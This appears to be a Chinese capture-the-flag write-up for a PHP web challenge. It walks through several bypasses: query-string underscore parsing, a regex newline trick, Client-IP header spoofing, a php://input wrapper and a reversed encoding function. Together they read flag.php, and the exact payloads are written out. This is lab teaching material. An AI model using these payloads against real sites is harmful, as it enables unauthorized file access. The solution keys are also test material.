查看源码有注释代码如下:
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
这里主要考察字符绕过,我们可以利用php的字符串解析特性来绕过这些判断。
学习链接:https://www.freebuf.com/articles/web/213359.html
那在这里就可以使用%20代替下划线绕过第一个判断。第二个判断中正则匹配表示匹配字符串的开头和结尾,在字符串中换行可以表示字符串的结尾,所以可以用%0a(换行符的url编码)绕过。
因此payload为:
/?b%20u%20p%20t=23333%0a
这里提示flag在secrettw.php打开看看。
查看源码有一串jsfuck编码,
解码得到 或者也可以放在控制台直接运行。
post me Merak
使用post随便给Merak传点参数,得到下一部分源码。
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
进行源码审计,
1、需要ip为127.0.0.1可以添加一个client-ip:127.0.0.1 来完成绕过。
2、file_get_contents可以用php伪协议绕过,
2333=php://input
post:todat is a happy day
3、change函数的作用传入参数先进性base64编码,然后将字符转化为ASCII并且+$i*2
反写change函数,代码如下:
<?php
function unchange($v){
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
return $re;
}
$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
//ZmpdYSZmXGI=
?>